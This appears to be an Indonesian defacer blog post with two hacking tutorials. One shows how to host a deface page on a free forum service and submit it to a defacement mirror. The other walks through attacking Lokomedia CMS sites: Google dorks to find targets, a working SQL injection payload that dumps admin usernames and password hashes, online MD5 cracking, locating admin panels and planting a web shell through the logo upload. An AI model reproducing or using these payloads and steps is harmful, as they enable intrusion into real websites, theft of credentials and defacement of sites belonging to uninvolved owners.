Deface metode Embeddable Web Apps

HALO DEFACER <3 

KEMBALI LAGI BERSAMA SAYA DISINI 

SAYA AKAN MENGAJARKAN CARA DEFACE BARU DENGAN CARA : 

DEFACE METODE EMBEDDABLE WEB APPS

YAK LANGSUNG AJA :  TUTOR :

1.Kalian pergi ke web : http://www.nabble.com/

2.Setelah Itu klik : Create Free Forum

3.Setelah kalian klik Create Free Forum  kalian isi tabelnya

username dan password bebas , tapi kalian isi email yg aktif untuk verif

Forum Name itu untuk Domain yg anda mau

setelah semuanya di isi dan klik CREATE FORUM 

Kalian CEK Di GMAIL / Email , yg ada tulisan VERIFIKASI

KLIK LINKNYA DAN KLIK CONTINUE

~Cara Upload filenya~

Hanya bisa berekstensi html dan txt

upload script ente langsung aja

1.Klik New Topik

2.bebas isi subject  setelah itu klik more 

3.Setelah itu pilih file ekstension 

4.Klo udah klik Post message

5. Jika udah , klik ekstensinya dan , MIROR IN

CONTOH Miror :  https://www.defacer.id/291417.html

THANKS SAMPE DISINI TUTOR NYA , ASSALAMUALAIKUM :) 

Cara Deface Dengan Menggunakan SQL Lokomedia 2017 (NEW)

Malem Gan

PH4NTHER ingin kasih tutorial cara deface dengan Menggunakan SQL LOKOMEDIA 

Saya post ini tutor untuk kasih tau ke kalian cara deface dengan sql lokmed gan 

Jangan di salah gunakan Tutor ini !!!

Yuk Langsung aja 

Bahan : 

1. Dork : 

inurl:/statis-1-profil.html

inurl:/statis-2-profil.html

inurl:/statis-3-profil.html

inurl:/statis-3-stukturorganisasi.html

inurl:/kategori-23-hiburan.html

Kembangin lagi gan dorknya hehehe

2. Exploit

    'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

3. MD5 Decrypter

      KHUSUS MD5 DECRYPTER, LU DECRYPT PAKE OTAK LU NDIRI! 

      Bercanda :v Ada tools online nya kok :p

https://hashkiller.co.uk/md5-decrypter.aspx

http://md5online.org/

========= TUTORIAL=========

1. Dorking pake dork di atas.

2. Pilih salah satu target. Salah dua juga gapapa :v

3. Masukan injeksi nya.

'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ 

   

Gatau caranya? :v Sini gw ajarin :p

   http://site.co.li/statis-1-profil.html lu tambahin exploit nya sesudah angka. Jadinya gini:

   http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

Kalo VULN Pasti ada USER ADMIN dan angka / code mujarab wekwkeak :v

seperti : Admin 23723728

Klo ga keliatan bisa CTRL + U  , CTRL + F Cari : admin

lalu copy MD5 / Code mujarabnya ke MD5 Decrypter

4. Tinggal cari admin page nya. Biasanya sih di:

http://target.co.li/admin

http://target.co.li/adminweb

http://target.co.li/administrator

http://target.co.li/redaktur

Klo ga ketemu bisa pake Login admin Online / admin finder online

Masih ga ketemu? Cari target lain :D

Tanem shell ? di logo biasanya

akses shell klik kanan aja gambarnya , lalu Copy url image

Nitip nick : PH4NTHER dan nitip Team : Cyrus Cyber

Via Video? : https://www.youtube.com/watch?v=0jpUxCEkkc4&t  < Neh

Tutor Sampe sini dlu ya gan <3 Bye